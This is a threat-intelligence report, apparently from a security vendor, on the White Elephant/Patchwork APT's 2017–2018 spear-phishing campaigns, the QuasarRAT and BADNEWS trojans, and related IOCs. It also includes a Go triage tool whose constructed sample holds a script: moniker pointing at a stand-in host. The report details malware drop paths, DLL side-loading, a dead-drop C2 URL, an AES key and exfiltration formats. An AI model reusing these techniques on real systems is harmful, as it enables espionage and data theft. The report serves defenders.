"White Elephant" APT Group: Analysis Report on Recent Activity
Published: 2018-03-31
"White Elephant" (白象), also known as "Patchwork" and "Mahagrass" (摩诃草), is suspected to originate from a South Asian country. Since 2012 it has continuously conducted network attacks against China, Pakistan and other countries, stealing scientific-research and military material from the target countries over the long term. What sets this group apart is how well it tailors its lures: it forges different versions of military and political material depending on the target, and uses them as the entry point for further penetration.
Since the second half of 2017 we have identified several new attack incidents linked to the White Elephant group. The group sends spear-phishing emails that, combined with social engineering, carry links to documents weaponised with Office file-format vulnerabilities, luring the victim into downloading and opening them. Once the exploit succeeds, the document downloads variants of remote-access trojans such as Quasar and BADNEWS.
Attack Incident Analysis
Attack Incident A
The first concentrated wave occurred around November 2017, when we observed the group launching multiple spear-phishing email attacks. Representative cases:
1. An email delivers a docx document named China_Strategic_Chain; the email body describes the document's content to entice the recipient to open it.
2. When the user opens the document, it shows a prompt to enter a password KEY in an input field and then click the icon at the upper left to unlock it. In reality the "input field" is a plain text box and the icon is an embedded OLE object, which is activated when clicked.
3. Extracting the embedded OLE object shows that it is a PowerPoint document in ppsx (auto-play slideshow) format named Start_chain_1; clicking it starts the slideshow automatically.
4. The ppsx exploits CVE-2017-0199. The exploit triggers as soon as the slideshow auto-plays, and downloads and runs an sct script.
5. Once decoded, the sct script invokes PowerShell to download and run putty.exe and to open Strategic_Chain.pdf automatically, so that the user believes the intended document has opened successfully.
6. Besides the incident above, the group also emailed a ppsx document named Entanglement that likewise exploits CVE-2017-0199, using tradecraft similar to the first incident.
7. The difference from the other incidents is that after the user opens this ppsx and the exploit fires, PowerShell downloads a ppt named decoy, which PowerPoint then loads as the decoy.
Attack Incident B
The second concentrated wave occurred in March 2018. The delivered documents mainly exploited CVE-2017-8570, and most of their content concerned social and political affairs.
The attack documents all use exactly the same technique: each contains two Package-type OLE objects and one structured-storage-type OLE object.
The two Package-type OLE objects rely on the Packager.dll mechanism, which is responsible for dropping the embedded files into the %TMP% directory.
The last OLE object exploits CVE-2017-8570, loading the contents of the sct file through a Scriptlet Moniker.
After the exploit succeeds, each document ultimately drops and launches a program named qrat.
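The lure documents in Incidents A and B share two structural features that can be checked without opening them in Office: an embedded OLE object (the ppsx hidden inside the docx in Incident A; the two Package objects in Incident B) and a relationship that points outside the package (the script: moniker behind CVE-2017-0199). The Go program below is an added triage example, not code from this report or from the group's samples: it unpacks an OOXML container, classifies embedded objects by their file magic and flags external relationships. The ppsx-shaped sample it builds in memory, its part names and the example.invalid URL are constructed for the example. It covers only zip-based OOXML (docx/pptx/ppsx); documents in other containers (RTF, for instance) need a different parser, and the embedded CFB object still has to be opened with an OLE parser to recover the Package payload.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/xml"
	"fmt"
	"io/fs"
	"strings"
)

// Finding is one suspicious feature found inside an OOXML package.
type Finding struct{ Part, Reason, Detail string }

// relationships mirrors a _rels/*.rels part; encoding/xml matches local names,
// so the package namespace does not have to be spelled out.
type relationships struct {
	Rel []struct {
		Type       string `xml:"Type,attr"`
		Target     string `xml:"Target,attr"`
		TargetMode string `xml:"TargetMode,attr"`
	} `xml:"Relationship"`
}

// cfbMagic is the OLE compound-file header Package and structured-storage objects start with.
var cfbMagic = []byte{0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1}

// TriageOOXML unpacks a docx/pptx/ppsx and reports external relationships
// (script: monikers, linked OLE objects) and embedded objects.
func TriageOOXML(doc []byte) ([]Finding, error) {
	zr, err := zip.NewReader(bytes.NewReader(doc), int64(len(doc)))
	if err != nil {
		return nil, err
	}
	var out []Finding
	for _, f := range zr.File {
		data, err := fs.ReadFile(zr, f.Name)
		if err != nil {
			return nil, err
		}
		switch {
		case strings.HasSuffix(f.Name, ".rels"):
			var r relationships
			if err := xml.Unmarshal(data, &r); err != nil {
				return nil, fmt.Errorf("%s: %w", f.Name, err)
			}
			for _, rel := range r.Rel {
				if rel.TargetMode != "External" {
					continue // references to other parts inside the package are normal
				}
				if strings.HasPrefix(strings.ToLower(rel.Target), "script:") {
					out = append(out, Finding{f.Name, "external script: moniker (CVE-2017-0199 pattern)", rel.Target})
				} else if strings.HasSuffix(rel.Type, "/oleObject") {
					out = append(out, Finding{f.Name, "linked (external) OLE object", rel.Target})
				}
			}
		case strings.Contains(f.Name, "/embeddings/"):
			kind := "unknown payload"
			if bytes.HasPrefix(data, cfbMagic) {
				kind = "OLE compound file (Package or structured storage)"
			} else if bytes.HasPrefix(data, []byte("PK")) {
				kind = "zip/OOXML payload (e.g. an embedded ppsx)"
			}
			out = append(out, Finding{f.Name, "embedded object: " + kind, fmt.Sprintf("%d bytes", len(data))})
		}
	}
	return out, nil
}

// BuildSample writes a constructed ppsx-shaped zip (not a real lure) with one slide
// relationship to an external script: moniker and one embedded OLE object.
func BuildSample() []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	for _, e := range []struct{ name, body string }{
		{"ppt/slides/slide1.xml", `<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"/>`},
		{"ppt/slides/_rels/slide1.xml.rels", `<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">` +
			`<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>` +
			`<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="script:http://example.invalid/Start.sct" TargetMode="External"/>` +
			`</Relationships>`},
		{"ppt/embeddings/oleObject1.bin", string(cfbMagic) + strings.Repeat("\x00", 24)},
	} {
		w, err := zw.Create(e.name)
		if err != nil {
			panic(err)
		}
		w.Write([]byte(e.body))
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	findings, err := TriageOOXML(BuildSample())
	fmt.Println(err)
	for _, f := range findings {
		fmt.Printf("%-36s %s: %s\n", f.Part, f.Reason, f.Detail)
	}
}
```

Internal relationships (the slideLayout reference in the sample) are ignored, so a clean document produces no findings; any External relationship whose target begins with script: is the CVE-2017-0199 pattern worth quarantining on sight.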
Attack Incident C
At almost the same time, the White Elephant group launched several further attacks, mainly spear-phishing emails carrying documents that exploit CVE-2015-2545 and CVE-2017-0261. The exploit documents covered several themes, including recent military developments of the Pakistan Army and information relating to the Pakistan Atomic Energy Commission. Once triggered, these documents drop a new version of the BADNEWS family of trojans.
Trojan Analysis
Across the incidents above, the downloaded (dropped) trojans are mainly of two kinds: QuasarRAT and BADNEWS.
QuasarRAT Trojan
In Incidents A and B the downloaded (dropped) trojan is QuasarRAT.
1. The dropped trojan's version information is forged to look like Microsoft, Qihoo 360 or similar vendors.
2. QuasarRAT is written in C#, but the newly discovered samples wrap it in an additional Loader layer. The Loader's main job is anti-detection and anti-sandbox evasion, after which it loads the original QuasarRAT. The QuasarRAT payload itself is heavily obfuscated.
3. Its main functionality consists of the following parts:
4. Collecting system information.
5. After collecting the information, the sample attempts to connect to the C&C server.
6. Finally it sends the collected information (virtual-environment indicators, antivirus software, hostname, username, etc.) to the C&C server.
BADNEWS Trojan
In Incident C the dropped trojan is BADNEWS.
1. After the document triggers the exploit, it drops three files:
%PROGRAMDATA%\Microsoft\DeviceSync\VMwareCplLauncher.exe
%PROGRAMDATA%\Microsoft\DeviceSync\vmtools.dll
%PROGRAMDATA%\Microsoft\DeviceSync\MSBuild.exe
VMwareCplLauncher.exe is a legitimately signed executable; vmtools.dll is a modified DLL whose purpose is to load MSBuild.exe, the latest BADNEWS variant.
2. When VMwareCplLauncher.exe runs it automatically loads vmtools.dll from its own directory (DLL side-loading). vmtools.dll then creates a scheduled task named BaiduUpdateTask1 that executes MSBuild.exe once every minute.
3. When MSBuild.exe runs, it downloads
hxxps://raw.githubusercontent.com/husngilgit/husnahazrt/master/xml.xml
and extracts the Base64 string between "[[" and "]]"; after two rounds of base64 decoding and several rounds of decryption it obtains the C&C address the sample connects to (a dead-drop resolver hosted on a public code-hosting site).
4. It assembles the host check-in information and sends it to the hard-coded C&C address. The check-in format is: uuid=[UUID] #un=[login name]#cn=[computer name]#on=[OS version] #lan=[IP address]#nop=#ver=1.0. The data is encrypted with AES (key: DD1876848203D9E10ABCEEC07282FF37), base64-encoded and sent to //e3e7e71a0b28b5e96cc492e636722f73//4sVKAOvu3D//ABDYot0NxyG.php
5. After base64 encoding, "=" and "&" characters are additionally inserted at fixed offsets in the encoded data.
6. It collects a list of sensitive files on the client's non-removable disks
(.xls, .xlsx, .doc, .docx, .ppt, .pptx, .pdf, etc.) and saves it as edg499.dat in the temporary directory.
7. It creates a thread that saves keystroke logs, window titles and similar information as TPX498.dat in the temporary directory.
8. The data saved in these dat files is sent with the same AES encryption + base64 encoding, but to a different hard-coded path: \e3e7e71a0b28b5e96cc492e636722f73\4sVKAOvu3D\UYEfgEpXAOE.php
Summary
The White Elephant group's current targets are a broad range of organisations in Pakistan and China, spanning education, the military, scientific research, the media and other sectors. Its initial-access technique is mostly spear-phishing email carrying links to weaponised documents, and it is adept at forging relevant military and political material with considerable care.
The group has grown into a small team with fairly high attack capability; the exploitation techniques it uses are relatively current, and its grasp of social engineering is quite precise, as the recent incidents show. Groups like White Elephant rely mostly on internet entry points such as email, which in principle can be defended well, but persuasive lure text can neutralise those defences. Strengthening staff security-awareness training is therefore an effective way to prevent incidents of this kind.
Related IOCs
rannd.org
brokings.org
crazywomen-dating.com
ifenngnews.com
209.58.185.37
mail.ifenngnews.com
chinapolicyanalysis.org
94.242.249.203
209.58.183.33
About the Jinjing Security Research Team
The Jinjing (金睛) Security Research Team is a technical team within the Venustech Group's Detection Products Division that performs professional security analysis. Its main responsibility is mining and analysing the security incidents and sample data reported by existing products, and providing professional analysis reports to users.
About the VenusEye Threat Intelligence Center
The VenusEye Threat Intelligence Center (www.venuseye.vip) is a threat intelligence cloud service platform built by Venustech that integrates threat intelligence collection, analysis, processing, publication and application, delivering threat intelligence data, systems, technology and professional expertise.